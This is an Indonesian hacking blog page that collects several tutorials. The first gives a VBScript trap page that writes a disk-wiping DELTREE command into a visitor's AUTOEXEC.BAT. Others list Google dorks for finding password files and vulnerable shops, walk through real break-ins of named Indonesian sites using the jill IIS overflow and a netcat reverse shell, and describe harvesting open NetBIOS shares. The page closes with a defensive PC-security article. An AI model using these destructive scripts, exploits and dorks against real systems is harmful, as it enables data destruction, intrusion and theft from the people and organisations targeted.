Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

3

Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

mp3 Player

Efek klik kanan

Senin, 25 April 2016

Hacking windows lewat jebakan situs

Hacking windows lewat jebakan situs 


Saya akan memberikan gambaran apa maksudnya judul diatas, pertama mungkin kalian sudah terbiasanya yg namanya bahasa html & pemrograman vbscript, javascript dsb,<<<langsung aja deh. tugas kalian disini yaitu membuat situs tapi di kondisi tertentu diletakan sebuah script yang mungkin bisa mendelete, memformat bahkan mengacak-ngacak komputer target dengan cara jebakan situs. caranya mudah :
Kamu musti publikasikan situs kamu ke komputer target, ya lewat e-mail atau yang lainnya.
Trus taruh tuh script didirektory situs yang kamu punya terserah mo taruh di default.html, Guest book, e-mail form dsb.
sekarang lihat lah script dibawah ini...

<HTML>
<HEAD>
<TITLE>SKRIPT VB PERTAMA </TITLE>
</HEAD>
<SCRIPT LANGUAGE="VBSCRIPT">
const forReading=1, forwriting=2, forappending=3
const tristateUsedefault = -2, TristateTrue = -1, TristateFalse=0
Dim fs, f, ts, s
set fs=createobject("scripting.Filesystemobject")
fs.createtextfile"C:\AUTOEXEC.BAT"
set f = fs.getfile("C:\AUTOEXEC.BAT")
set ts = f.openastextstream(forwriting, TristateUsedefault)
ts.write "DELTREE /Y C:\"
ts.close
</script>
</BODY>
</HTML>


script diatas sebenarnya menggunakan object Visual basic Script yang memanfaatkan
Active X, kalian bisa ganti variabel fs atau f untuk membuat nama file lain.
Sebagai contoh saya hanya membuat file autoexec.bat yang nantinya akan melakukan
eksekusi hapus direktori mana kalian suka. sorry saya nggak ada maksud jahat...


ok sekian aja saya nggak bisa jelasin secara detail kalian mungkin bisa mengembangkannya menjadi lebih baik dari ini, semua karena keterbatasan ilmu penulis.
Semoga artikel ini menjadi manfaat yang positif.



Seni Internet, Googling

Seni Internet, Googling 

- Terinspirasi dengan Seni Internet ‘Hacking’, saya coba membuat tulisan dengan judul yang mirip (dimiripkan) yang akan membahas tentang penggunaan ‘google - googling’

Tidak tahu apakah penggunaan google ini sudah bisa disebut seni atau bukan dan mudah mudahan juga istilah seni internet tidak dipatenkan sehingga saya tidak disebut plagiat dan harus membayar fee J .  Tulisan ini dibuat untuk berbagi pengalaman mudah-mudahan bermanfaat dan semoga juga tidak membosankan serta tidak mengesalkan.



Satu keumuman yang dapat dicermati ketika kita membaca tulisan-tulisan yang ditampilkan di Jasakom (mungkin juga di situs-situs lain yang berkaitan dengan tema-tema h4x0r) adalah penulisnya menggunakan google sebagai mesin pencarinya.   Banyak ungkapan menarik  yang  dituliskan untuk menunjukkan kedekatan para penulis ini dengan google.  Di bawah ini diberikan contoh beberapa ungkapan tersebut yang diambil dari tulisan di Jasakom.



“ ...  Paman Google ( Search Engine Favorit ku ) “

“... apa itu VBS? baca google yah ...”

“ ... oke langsung saja buka www.google.com cari aja yang ada hubungannya dengan php nuke ...”

“...mari cari target buka http://www.google.co.il/ ...”

“ ... Buka browser anda ke alamat: www.google.com lalu ketikkan keyword ...”

“... banyak banget ya target yang tampil di jendela si google...”

“...nah seperti biasa....GOOGLING!!! hehehe ...”



Dari ungkapan-ungkapan tersebut mungkin akan timbul pertanyaan ... memangnya Ada Apa dengan Google ? ... Loh kok enggak pake mesin pencari lain yah ?. .. Apa sih keunggulan yang diberikan oleh google? ..... Untuk menjawab pertanyaan-pertanyaan tersebut salah satu diantaranya adalah dengan menunjukkan bagaimana relevansi antara apa yang kita ingin cari dengan apa yang dihasilkan oleh suatu mesin pencari.  Terdapat beberapa penelitian yang telah dilakukan orang yang mencoba membandingkan hasil pencarian yang dilakukan google dengan mesin pencari lain.  Salah satunya adalah penelitian yang dilakukan oleh Salokhe et al (2003, FAO-UN, Food and Agriculture Organizaion – United Nation) yang mencoba membandingkan kinerja google dan metacrawler dalam melakukan pencarian untuk database AGRIS yang dimiliki FAO.  Hasil penelitan tersebut menunjukkan bawah google memberikan kualitas pencarian yang lebih baik dibanding metacrawler (he..he.. jadi serius nih).



Selain memang kualitas hasil pencarian google yang baik, pilihan rekan-rekan untuk menggunakan google sebagai mesin pencari memang tidah salah.   Coba lah pilihan interface h4x0r yang disediakan google di  http://www.google.com/intl/xx-hacker/ , seolah olah dengan menggunakan google kita sudah merasa jadi hacker (J, lol, walaupun hanya tulisannya).  Dan untuk lebih meyakinkan lagi bahwa menggunakan google sebagai mesin pencari kita memang pilihan yang tepat coba juga lihat disalah satu pertanyaan dan jawaban  dalam FAQ yang disediakan  google sendiri seperti tertera di bawah ini:



---------------------------------------------------------------------------------------------------------

“Mengapa Googlebot mendownload informasi dari web server "rahasia" saya?

Hampir-hampir mustahil untuk menjaga merahasiakan sebuah web server dengan cara tidak mempublikasikan link apapun ke halaman itu. Begitu ada orang yang mengikuti sebuah link dari server "rahasia" Anda ke web server lain, tampaknya URL "rahasia" Anda ada pada tag referalnya, dan bisa disimpan dan mungkin diterbitkan oleh web server yang lain dalam log referalnya. Jadi, jika ada link ke web server atau halaman "rahasia" Anda di manapun di web, tampaknya Googlebot dan "penjaring web" lain akan menemukannya.



-------------------------------------------------------------------------------------------------------------



Apa yang bisa dilakukan dengan google ?



Target utama kita menggunakan mesin pencari adalah mendapatkan informasi tertentu sesuai dengan tujuan kita.  Nah, informasi-informasi apa saja yang bisa kita dapatkan dengan google adalah bentuk informasi berikut (selain pencarian informasi umum misalnya tutorial, white paper dll):

§         Menemukan target web yang dapat dieksploitasi dimana:

§         Target tersebut menjalankan sistem informasi tertentu

§         Target tersebut menjalankan software web server tertentu

§         Target tersebut memiliki kelemahan/hole (vunerabilities) tertentu

§         Target tersebut memiliki data sensitif di dalam direktori publik

§         Target tersebut memiliki data sensitif di dalam file publik

§         Selain hal di atas kita juga bisa memanfaatkan google misalnya sebagai server proxy (bagaimana caranya akan dibahas di bagian selanjutnya, walaupun tidak sebagai anonymous proxy), menghasilkan hal-hal yang lucu dari hasil pencariannya, dan banyak lagi hal lainnya dengan memanfaatkan fitur-fitur yang sediakan oleh google (Cobalah situs berikut http://douweosinga.com/projects/googlehacks yang memanfaatkan fitur Web API google untuk membuat kalimat otomatis, membuat kalimat dalam gambar dan lain sebagainya).



Syntax dan Fitur-fitur yang disediakan google



Untuk mendapatkan apa yang bisa dilakukan dengan google ada baiknya kita mengenali syntax yang disediakan oleh google untuk membantu melakukan pencarian.  Secara default google mengunakan operand AND apabila kita melakukan pencarian dengan lebih dari satu kata.  Untuk pencarian dalam bentuk frasa maka kita harus menggunakan tanda kutip yang melingkupi kata kunci yang kita masukkan.  Sedangkan untuk memaksa google agar tetap memasukkan kata-kata umum (misal how, of, for, dll) dalam sistem pencariannya maka kita harus menggunakan tanda plus (+) di depan kata yang umum tersebut. Syntax-syntax ini digunakan secara langsung dalam kolom pencarian dan penggunaannya dapat dikombinasikan.  Adapun syntax-syntax lain yang sangat membantu pula dalam pencarian adalah sebagai berikut:



Field
 Tujuan Penggunaan

intitle:
 Menemukan halaman-halaman web yang di dalam title HTML-nya mengandung katakunci (keyword) yang kita masukkan.  Contoh intitle:search berarti akan menemukan halaman yang didalam title HTML-nya mengandung kata ‘search’

inurl:
 Menemukan URL (host, nama path, nama file)yang memiliki kata kunci yang kita masukkan.

filetype:
 Menemukan tipe file tertentu

site:
 Menemukan halaman pada situs tertentu

link:
 menemukan halaman yang memiliki hiperteks link ke URL tertentu

Dan beberapa syntax lain bisa lihat di  http://www.googleguide.com/advanced_operators.html




Terdapat banyak fitur disediakan oleh google untuk lebih membantu kita sebagai pengguna dalam mendapatkan informasi yang diinginkan.  Dari halaman depan google, kita bisa melakukan pencarian gambar melalui pilihan ‘images’,  melakukan pencarian arsip dikusi di USENET melalui pilihan ‘groups’, ataupun melakukan pencarian berdasar topik tertentu melalui pilihan ‘directory’.   Fitur lainnya akan tampak apabila kita klik menu ‘more’ dalam tampilan awal google.  Fitur-fitur tersebut diantaranya fitur translate tool, fitur Web API dan lain sebagainya.





Dimana letak seninya googling ?



Seni dari googling terletak pada kreativitas kita dalam mengolah/memanfaatkan kata kunci dan fitur yang disediakan google sehingga dapat menghasilkan hal/informasi yang umum ataupun tidak umum.  Agar lebih jelas bagaimana kita melakukannya, bagian selanjutnya dari tulisan ini akan memberikan contoh dari penggunaan fitur dan kata kunci tersebut.



Google sebagai proxy.  Kita dapat menjadikan google sebagai proxy server dengan memanfaatkan fasilitas translate.  Walaupun google proxy ini tidak bersifat anonymous, tetapi siapa tahu dengan menggunakan proxy google akses menjadi agak lebih cepat terhadap suatu site (karena sifat connectionless oriented dari protocol IP) atau cukup bisa mengelabui admin yang kurang teliti.  Untuk melakukan hal di atas kita bisa memilih menu more dalam google atau menggunakan url berikut http://www.google.com/language_tools?hl=en .  Untuk situs yang berbahasa indonesia, tinggal kita masukkan saja url-nya pada bagian translate web atau masukkan dalam url berikut http://translate.google.com/translate?u=http://www.situstarget.com&langpair=id|id .   Untuk situs-situs yang berbahasa inggris, tinggal ganti id|id menjadi en|en (sebenarnya untuk situs yang berbahasa Indonesia bagian ujung dari url bebas tidak harus id|id).  Sebagai contoh situs target, biasanya saya senang menggunakan jasakom karena menyediakan script untuk menampilkan proxy kita.



Tanpa Google
 Dengan Google

http://translate.google.com/translate?u=http://www.situstarget.com&langpair=id|id









Mecari target untuk suatu eksploit yang ditemukan.  Contoh-contoh untuk kemampuan google yang satu ini sudah banyak diketengahkan di situs jasakom.  Biasanya syntax yang dipakai adalah “inurl:” plus yang lainnya .  Misal kita menemukan bahwa VP-ASP (Virtual Programming - ASP) sebagai salah satu shooping cart yang dikenal di Eropa dan US untuk membuat toko online memiliki kelemahan pada script halaman adminnya.  Kelemahan tersebut adalah script adminstrasinya bisa di XSS dan di Injeksi SQL (http://securitytracker.com/alerts/2002/May/1004384.html).  Dengan melakukan XSS atau SQL injection terhadap script ini dapat memperlihatkan detail data credit card dari pelanggan. Adapun script administrasinya ada di file shopadmin.asp.  Lalu, bagaimana mencari target yang memiliki kelemahan ini, caranya adalah dengan menggunakan keyword berikut pada google  -- inurl:shopadmin.asp “shop adminstrators only” --- http://www.google.com/search?hl=en&lr=&ie=UTF-8&&q=inurl%3A%22shopadmin.asp%22+%22Shop+Administrators+only%22 .





Menemukan password.   Sesuatu yang harusnya tidak untuk diketahui untuk umum, semacam password dan lainnya,  karena adanya sedikit kesalahan dalam setting atau lainnya, atau juga karena adanya keinginan orang untuk berbagi, memberikan kesempatan pada google untuk menemukan hal seperti ini.  Contoh untuk pencarian password dengan google misalnya dengan mencari file password yang memiliki nama password juga dengan tipe file mungkin txt juga mungkin dat.  Kita ambil contoh keyword --- filetype:dat “password.dat” -- http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Adat+%22password.dat%22 .  (jika ditemukan password yang dienkripsi, silahkan deskripsi dengan JTR atau program yang lainnya.  Lebih mudah untuk melihat hasil pencarian dengan mengikut link “cached” dari google).  Keyword lain yang dapat digunakan -- filetype:bak inurl:"htaccess|passwd|shadow|htusers" -- , --- "# -FrontPage-" inurl:service.pwd --



Bagaimana mencari password yang dishare orang lain (pihak ketiga) terutama untuk situs yang ehmm ehmm ;).  Situs-situs tersebut biasanya di authenticasi dengan cara standar yang memungkinkan kita melakukan akses dengan mengetikan pada address bar menggunakan pola ‘http://xxxxx:xxxxxx@www.hehehe.com/members’.  Untuk itu, bisa kita coba dengan mengetikkan keyword frasa berikut pada google -- “http://*:*@www”—untuk tambahan query bisa kita tambahkan setelah frasa dengan nama situsnya misal ..... (silahkan tebak sendiri he...he..)



Melihat direktori tertentu dari suatu site.   Suatu site yang tidak terkonfigurasi dengan baik akan memungkinkan google dapat menampilkan struktur file yang mungkin cukup sensitif.  Keyword untuk tujuan ini biasanya menggunakan frasa “index of”.  Contoh keywordnya adalah -- intitle:"index.of.secure" -- intitle:"index.of.secure" – intitle:’index of cgi-bin” --- .



Mencari kelemahan suatu server dari hasil kerja orang lain.  Untuk menemukan informasi kondisi suatu server, kadang-kadang kita tidak perlu melakukan sendiri scanning terhadap server tersebut.  Kita bisa mecari bagaimana profil suatu server menggunakan google berdasarkan laporan dari pihak lain yant telah melakukan assesment untuk suatu serve.  Bisa dicoba sontohnya  dengan keyword berikut -- filetype:pdf "Assessment Report" nessus –





Penutup



Apa yang diketengahkan di atas hanya sebagian kecil dari kreativitas mengolah keyword untuk google.  Masih banyak lagi yang belum dinyatakan dalam tulisan ini yang mungkin rekan-rekan telah ketahui sebelumnya atau mungkin rekan-rekan sendiri yang punya ide baru dalam mengolah keyword untuk google.  Dan yang pasti, koleksi terbanyak ada di net sana (coba – filetype:txt inurl:googletut1 -- )












Exploitasi www.asaba.co.id melalui Web Printing

Exploitasi www.asaba.co.id melalui Web Printing 

Bukan ! *@#&*&@ ini bukan unicode. Inilah contoh nyata dari exploitasi melalui web printing dari artikel sebelumnya oleh saya dan djava8zi jadi bisa dikatakan sebagai artikel versi ke 3. Karena banyaknya yang menanyakan tentang bagaimana exploitasi dari web printing ini maka dengan ini saya akan memberikan contoh nyata dari exploitasi ini dan semoga semua pertanyaan bisa terjawab.



Seperti yang telah di terangkan pada 2 artikel sebelumnya kita akan melakukan exploitasi berdasarkan keterangan yang telah diberikan sehingga saya tidak perlu lagi memberikan anda keterangan tentang bug ini terlalu jauh. Berikut adalah tampilan dari sisi listening windows (note : saya menjalankan ini semua melalui windows 2000 profesional sebagai bantahan atas banyak pernyataan yang mengatakan anda harus menggunakan linux)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\>f:

F:\>cd jill

F:\Jill>nc -l -p 33 -vv
listening on [any] 33 ...



Kemudian saya menjalankan lagi windows ke 2 dengan jill

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\>f:

F:\>cd jill

F:\Jill>jill www.asaba.co.id 80 202.152.24.101 33
iis5 remote .printer overflow.
dark spyrit / beavuh labs.

connecting...
sent...
you may need to send a carriage on your listener if the shell doesn't appear.
have fun!

F:\Jill>



Dari windows pertama kemudian saya menjalankan perintah :



F:\Jill>nc -l -p 33 -w
listening on [any] 33 ...
202.155.6.162: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [202.152.24.101] from (UNKNOWN) [202.155.6.162] 5576: NO_DATA


Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>cd\inetpub\wwwroot
cd\inetpub\wwwroot

C:\Inetpub\wwwroot>echo im  Here  > news.txt



Kini selesailah sudah tugas sederhana ini, dimana tentu saja dengan berbagai macam teknik dan karena anda mempunyai hak system banyak yang bisa dilakukan seperti mengambil alih seluruh komputer bahkan jaringan yang lokal bisa anda dapatkan. Ngak percaya ? ;) karena anda masuk dengan shell semacam telnet anda bisa melakukan banyak sekali hal yang jauh lebih berbahaya daripada bug unicode. Sebagai bukti dari file yang telah di buat anda bisa melihat ke alamat : http://www.asaba.co.id/news.txt





Note :  Kami tidak merusak data maupun hal-hal lain yang merugikan, kejadian-kejadian diluar ini atas dipublikasikannya artikel ini adalah diluar tanggung jawab kami.





Bagaimana Kantor Anda Bisa Di Hack

Bagaimana Kantor Anda Bisa Di Hack 

Suatu pagi anda  sedang asyik-asyiknya bekerja dan kemudian anda melakukan koneksi ke internet. Wahh, liat berita dulu deh pikir anda, maka koneksipun dilakukan, eh bos belon datang bisa chatting bentar deh ama kirim-kirim sms, toh semua dokumen sudah selesai dikerjakan.Begitu anda selesai melakukan koneksi dan anda lihat kedalam komputer anda untuk mereview sekali lagi dokumen yang telah di buat ternyata telah hilang semua. Tragis memang....
    Mari kita lihat cerita diatas yang mungkin tidak akan anda sadari, seperti anda tidak melakukan download apapun dan komputer anda dilundungi oleh personal firewall dan juga anti virus 10 macam yang terbaru tetapi data anda bisa hilang. Ada apa gerangan ? apakah anda pikir hal tersebut tidak mungkin ?

    Hal ini sebenarnya dengan gampang terjadi jika anda melakukan sharing di komputer anda dan melakukan koneksi ke internet. Begitu ada orang iseng yang mengecek semua IP, akan bisa melihat sharing anda (melalui netbios) dan bisa melakukan koneksi kedalam komputer anda. Tentu saja bukan tidak mungkin bagi orang untuk menghapus data-data anda. Terdapat juga program yang dengan mudah bisa digunakan oleh semua orang yang memungkinkan kita mengecek range IP sehingga semua komputer dengan range tersebut bisa di cek otomatis. Celakannya waktu penulis melakukan pengecekan hampir 5% dari range semua bisa dimasuki. Data-data perusahaan seperti piutang, surat-surat penting, dll semua bisa penulis dapatkan. Banyak perusahaan besar seperti yang terdapat di sudirman, dll bisa diambil bahkan diacak-acak sesuka hati. Program yang dimaksud adalah Legion yang dikeluarkan oleh group security/hacker "Rhin09" yang pernah membuat tutorial hacking NT.

.



    Setelah anda selesai melakukan pengecekan dengan Legion, langkah selanjutnya anda tinggal menggunakan map drive atau dengan klik drive yang di maksud, maka tamatlah sudah target anda yang ceroboh...





Note : Sangat diharapkan untuk tidak menggunakan pengetahuan yang diperoleh untuk hal-hal yang merugikan orang lain. Pendapat dan kritik bisa anda masukkan dalam forum dan mailing list.



Hacking WebServer W2K Pake *nix ( polri.go.id )

Hacking WebServer W2K Pake *nix ( polri.go.id ) 


Dalam kesempatan kali ini saya ingin menulis sedikit tentang hacking WebServer Windows 2000 dengan unix. Awalnya dari www.polri.go.id ditemukan lobangnya dengan unicode, tetapi unicode saja tidak mampu untuk menulis didalam file index.html karena selain tershadow, read only, rupanya terencrypt pula dengan HTML-Encrypt. Maka itu saya ingin memperkenalkan hacking Win2000 dengan unix, mungkin baru tapi kita coba saja.

Beberapa hal yang harus diperhatikan sebelum hacking Windows 2000 :

- Webservernya pake OS Windows 2000 dan terpasang web printing (terpasang secara default)
- Tidak ada firewall/Firewall yang membolehkan outbond connection ke suatu port (Besar sekali peluang suatu webserver tidak memiliki firewall atau mensetup firewall dengan benar, dengan melihat persentase jumlah webserver yang ada dan kondisi firewall yang dimiliki.
- Cracker memiliki exploit (jill.c) dan program yang dapat menjalankan secara listening mode (netcat).

Terus nich exploit bisa di pake di shell *nix terserah yang penting berbasis *nic, ya iyalah.. kan.. lagi ngebahas hacking lewat unix masa pake tools iis, heuhehuehue :P Coba searching di http://www.yahoo.com | http://www.google.com | atau | http://published.localbox.net untuk  exploit win2k unix remote! Coba download, saya mengunakan exploit yang sangat sederhana yakni jill.c dan NC100.TGZ, ok langsung konek ke shell! Belum punya? Bagi Donk!! Enaknya.. Ini Shell bayar di shellindo.com belilah.. kalau kamu ingin maju jangan carding mulu.

compile jill.c
$gcc jill.c -o jill

extract file NC110.TGZ
$tar -xzvf NC110.TGZ

lalu compile NC tersebut
$make generic

(sebenarnya tergantung OS anda, tetapi biasanya command ini berhasil, jadi saya menganjurkan menggunakan perintah ini saja bagi para newbie, jika command tadi berhasil, maka akan muncul suatu file yang bernama nc, dan anda bisa menjalankannya) Untuk menjalankan nc anda sebaiknya menggunakan root, karena akses port yang di denied oleh *nix anda.

#nc -l -p <port> -vv

misalkan saja port yang anda sebutkan adalah 99, jadi perintahnya adalah nc -l -p 99 -vv

setelah ini anda berganti window,dengan menekan <Alt+F2> atau menekan <Alt+F3> atau yang lain.

Setelah berganti window, anda login, dan jalankan jill

$./jill target port attacker port

Misalkan situs polisi-cyber.com menggunakan Windows 2000 dan menggunakan IIS 5 dan bisa dihack, dan ip komputer kita adalah 202.152.14.5 maka yang akan kita ketikkan adalah :

$./jill polisi-cyber.com 80 202.152.14.5 99

jika sudah, kita perlu berganti window yang sebelumnya dimana nc sedang dijalankan. tunggu beberapa saat, dan akan muncul prompt command ala windows, maka anda telah memiliki server abcd.com dan anda bebas melakukan apa saja.. (jika setelah ditunggu beberapa saat tidak muncul command shell, anda dapat menekan <enter>)

Hmmm, setelah kita kerjai server tadi, lalu bagaimana? anda bisa melanjutkan dengan menggunakan cara upload seperti unicode, bisa dengan menggunakan TFTP atau dengan FTP.

Lalu bagaimana jika saya tidak memiliki root, saya memiliki account di addr.com Anda masih bisa mengerjai situs tadi, anda jalankan dulu nc versi windows.

C:\nc -l -p 99 -vv
listening on [any] 99 ...

dan anda menggunakan shell anda dan jalankan jill di komputer shell tadi (contohnya addr.com)

File Lainnya : NC110  NC11NT

Ok Sekain dari saya untuk www.polri.go.id ? Pikir sendiri donk.. bocorannya kayak gitu.. masa maunya disusuin terus.. heuhehuehue ok dech.. sampai ketemu di tutorial berikutnya tentang hacking www.mpr.go.id, sampai gua masuk ke sell 3 hari 2 malam.. huehuehuehue :) Tapi nggak apa2, akhirnya gua bebas juga.. huehehuehuehuehue ok deh.. tapi jangan lupa berdoa dolo sebelum masuk penjara :v





Hacking & PC Security

Hacking  & PC Security
k



 K

omputer sebagai alat produktivitas pada dasarnya memanfaatkan  perangkat-perangkat lunak word processor, spreadsheet, database, dan alat untuk


berkomunikasi. Alat untuk berkomunikasi ini ada karena adanya Internet,  terutama  dalam bentuk email dan web browser.
Kemudahan komunikasi melalui Internet  bukan tidak ada bahayanya. Dengan terhubung ke Internet,  berarti kom- puter anda masuk menjadi bagian dari Internet  itu sendiri, suatu jaringan yang menghubungkan jutaan komputer di seluruh dunia. Dan di dunia maya yang begitu luas ter- dapat bermacam karakter dengan bermacam perilaku pula. Sama seperti di dunia nyata, kita harus mempunyai  ke- mampuan untuk 'hidup'  di dunia maya ini.
Salah satu pengetahuan  yang harus dikuasai adalah cara mempertahankan diri (tepatnya mempertahankan kom- puter anda) sewaktu terhubung ke Internet.  Pada bahasan ini, diasumsikan bahwa anda terhubung ke Internet  me- lalui komputer yang paling lazim digunakan oleh para pemakai pribadi, yaitu menggunakan  sistem operasi Windows 9x/ME. Walau demikian, sebagian besar bahan- bahan bahasan berlaku pula untuk sistem operasi lain.

Ancaman Terhadap Komputer Anda
Ada tiga jenis ancaman pada komputer anda:
Local attack
Bahaya berinternet
Hacker attack
Local attack atau console hacking adalah usaha rekan anda sendiri untuk mengakses data anda secara tidak sah. Jadi si penyerang dapat mengakses komputer anda secara fisik dan berusaha masuk ke dalam penyimpanan  data. Apabila komputer anda tidak diproteksi dengan password, maka data anda dapat dilihat oleh siapa saja.



















!BIOS dapat menghapus password pada berbagai macam BIOS
















Informasi screen saver password terdapat pada registry, di bawah segmen HKEY_USERS\.DEFAULT\Control Panel\Desktop
















Ekspor bagian registry ang ada komponen password screen saver-nya, lalu crack dengan  95sscrk. Screen saver password langsung kelihatan!

Ada beberapa lapis pengamanan terhadap console hacking:
Men-set BIOS password
Men-set screen saver password
Men-set password pada folder
Men-enkripsi  dokumen-dokumen penting
Seperti maling dan polisi, ada saja teknik untuk membo- bol pertahanan  anda. BIOS password dapat di-reset dengan mengangkat baterai yang terpasang pada motherboard atau menggunakan  BIOS password cracker seperti misal- nya !BIOS yang mampu menghapus password pada macam- macam jenis BIOS. Screen saver password juga dapat di- crack dengan 95sscrk (Screen Saver Cracker). Keduanya mudah digunakan dan dapat diperoleh gratis di Internet.
Tinggal mengamankan  dokumen dengan melindungi fol- der dan file itu sendiri yang relatif lebih sulit dibongkar oleh hacker amatiran. Itupun belum seratus persen aman.




Identitas Komputer Anda  di Internet
Sebelum membahas ba- haya berinternet dan hacker attack, kita bahas dulu identitas komputer anda di Internet. Anda dapat kena bahaya da-

















Identitas komputer  anda di Internet ditetapkan dalam bentuk IP
address yang dapat dilihat dengan  mengetikkan winipcfg.

lam berinternet di antaranya  karena komputer anda dapat diakses. Komputer anda dapat diakses, sebab di Internet komputer anda ini mendapatkan identitas tersendiri berupa IP address.
Begitu anda terhubung ke Internet  melalui ISP (Internet Service Provider) anda, maka anda akan mendapatkan identitas berupa IP address. IP address pada pemakai Internet  biasa (dial up) biasanya merupakan IP dinamis, yaitu berubah-ubah setiap kali terhubung ke Internet.
IP address komputer lokal yang tidak terhubung ke Internet adalah 127.0.0.1, sedangkan apabila terhubung ke Internet  akan mendapatkan lagi satu IP address, misalnya
203.125.33.90 (atau lainnya tergantung  ISP anda).
Untuk mengetahui  berapa IP address anda, pilih Start > Run dan pada kotak dialog Run ketikkan winipcfg dan akan tampil kotak informasi IP Configuration. Pilih PPP Adapter dan di situ terlihat  berapa IP address komputer anda. IP address ini terlihat  oleh pihak lain di luar, se- hingga dapat menjadi obyek serangan.
Apabila komputer anda  merupakan bagian dari LAN (local area network), dan koneksi ke Internet  secara bersama- sama melalui satu komputer (disebut proxy server), maka IP address komputer anda ditetapkan secara lokal oleh ad- ministrator, biasanya IP address lokal ini formatnya
192.168.x.x atau sejenisnya. IP address ini tidak terlihat oleh pihak luar, sehingga komputer anda terlindung  oleh proxy server tadi.
Bahwa komputer anda menggunakan  Windows 9x/ME atau Windows NT ataupun yang lain dapat pula diketahui dari luar, sebab setiap sistem operasi mempunyai  'sidik jari'-nya  sendiri-sendiri. Khusus untuk Windows 9x/ME terlihat  dari terbukanya  port 139 (pada NT port 135 dan
139). Port lain yang lazim terbuka pada komputer anda (ini hal biasa sebab untuk mengirim dan menerima email) adalah port 25 (SMTP, mengirim email) dan 110 (POP3, menerima email).

Scan komputer  anda sendiri untuk melihat port-port apa saja yang terbuka. Dapatkan port-port ini sebelum hacker yang mendapatkannya!

Mengenal Internet Port Number
Service pada Internet  diakses melaui port-port  tertentu. Pada setiap IP address dapat diaktifkan port dengan nomor
0 sampai 65535 (didapat dari 2 pangkat 16). Port ini ber- sifat logis (bukan fisik seperti halnya serial port atau parallel port pada komputer anda), tapi seperti juga port fisik, digunakan untuk mengakses servis-servis tertentu pada Internet.
Port yang lazim digunakan adalah:
Port 21                FTP (File Transfer Protocol) Port 22                SSH (Secure Shell)
Port 23                Telnet
Port 25                SMTP (Simple Mail Transfer Protocol)
Port 80                HTTP (Hypertext Transfer Protocol)
Port 110              POP3 (post office protocol, version 3)
Port 119              NNTP (Network News Transfer Protocol)
Port 139              NetBIOS session service
Port 143              IMAP (Internet  Message Access Protocol)
Port 194              IRC (Internet  Relay Chat Protocol)
Bila kita mengakses suatu servis di Internet,  maka port- port di atas yang digunakan, tergantung  pada jenis service- nya. Bila kita berselancar (browsing), maka kita meng- akses port 80 pada situs yang kita akses. Bila kita meng- ambil email, maka digunakan port 110. Mengirim email menggunakan  port 25. Web email menggunakan  port 143. Membaca newsgroup lewat ISP anda menggunakan  port
119. Chatting menggunakan  port 194, dan lain sebagainya.
Adapun pada komputer kita sendiri sebagai yang meng- akses service, seharusnya  tidak banyak port yang terbuka. Pada umumnya hanya port 25, 110, dan 139 yang terbuka (diaumsikan menggunakan  Windows 9x/ME yang mem- buka port 139). Khusus untuk port 139 perlu mendapat perhatian khusus, sebab dapat merupakan celah untuk masuknya penyerang ke komputer Windows 9x/ME anda.
Apabila ada lagi port-port  lain yang terbuka, anda perlu waspada. Misalnya bila yang terbuka port 21. Apakah anda pernah menginstalasi program FTP server dan sekarang sedang berjalan? Juga bila port 23 terbuka, apakah anda menjalankan service Telnet? Kedua port ini tidak lazim terbuka pada komputer yang hanya dipakai mengakses Internet  (bukan memberi service pada komputer lain).
Untuk mengetahui  mana port-port  yang terbuka, guna- kan scanner seperti SuperScan atau UltraScan dan scan IP lokal anda (127.0.0.1) seperti contoh di bawah ini:



















Di sini tampak  bahwa ada 4 port yang terbuka. Port 25 dan 110 biasa terbuka, tetapi apa itu port 1005 dan 1025?


Seminar NeoTek


Dengan mencari informasi di Internet  melalui search engine (misalnya Google, www.google.com) akan didapat bahwa port 1005 adalah port Theef Trojan dan port 1025 adalah port Network Blackjack. Port-port  apa ini?
Dari mana port ini bisa terbuka? Port 1005 kemungkinan secara tidak sengaja kita men-download  suatu program, menjalankannya dan diam-diam Trojan Theef diaktifkan, membuka port ini, dan menjadikan komputer kita suatu server bagi komputer orang lain yang mempunyai pengen- dalinya! Adapun port 1025 tampaknya terbuka sewaktu secara tidak sengaja kita mengunjungi situs judi di Internet.

Bahaya Berinternet
Bahaya sewaktu berinternet sudah dimulai sewaktu anda berselancar dan dapat dibagi atas dua bagian besar:
Remote Controlled PC
Ιnfeksi Digital: Virus dan Trojan

Remote Controlled PC
Pada awalnya situs web hanya berisi teks dan gambar dan ini merupakan kemajuan pesat sejak adanya Internet.  Na- mun hal ini tidak berlangsung lama, sebab web menjadi lebih dinamis dengan menyertakan komponen-komponen aktif kedalamnya. Komponen-komponen  ini selain mem- buat web lebih menarik, juga menyimpan  potensi bahaya dari penyalahgunaannya. Ada empat active component yang sedang marak, yaitu ActiveX, Java applet, JavaScript, dan VBScript.
Apabila static content disajikan dari server, maka active content dijalankan pada komputer pengguna. Pada Windows, active content yang paling berbahaya adalah milik Microsoft sendiri, yaitu ActiveX. Suau komponen ActiveX adalah executable program yang built-in pada suatu situs web. Bila anda masuk ke situs web ini, maka browser akan me-load halaman web ini beserta built-in component-nya, dan menjalankannya pada komputer anda.
Komponen ActiveX yang dapat dibuat dengan Visual Basic ini (juga dari Microsoft) mempunyai  beberapa sifat seba- gai berikut:
Sebagai suatu program Visual Basic, dapat mengakses semua fungsi pada PC anda. Browser anda tidak dapat mengendalikan fungsi apa yang akan dijalankan dan apa yang tidak.
Hanya programmer-nya yang tahu fungsi apa pada PC anda yang akan dijalankannya. Bisa saja misalnya suatu situs web menawarkan suatu game, yang bila anda main- kan akan menginstalasi Trojan pada komputer anda (atau lebih gawat lagi langsung mem-format  hard disk anda!) sewaktu anda menjalankannya.
Untuk melindungi komputer anda dari bahaya ActiveX, paling baik dengan me-non- aktifkannya. Caranya pada browser pilih Tools > Internet Options untuk masuk ke jendela Internet Options. Disini pilih
tab Content dan klik tombol Custom Level. Pilih disable terhadap ActiveX.

















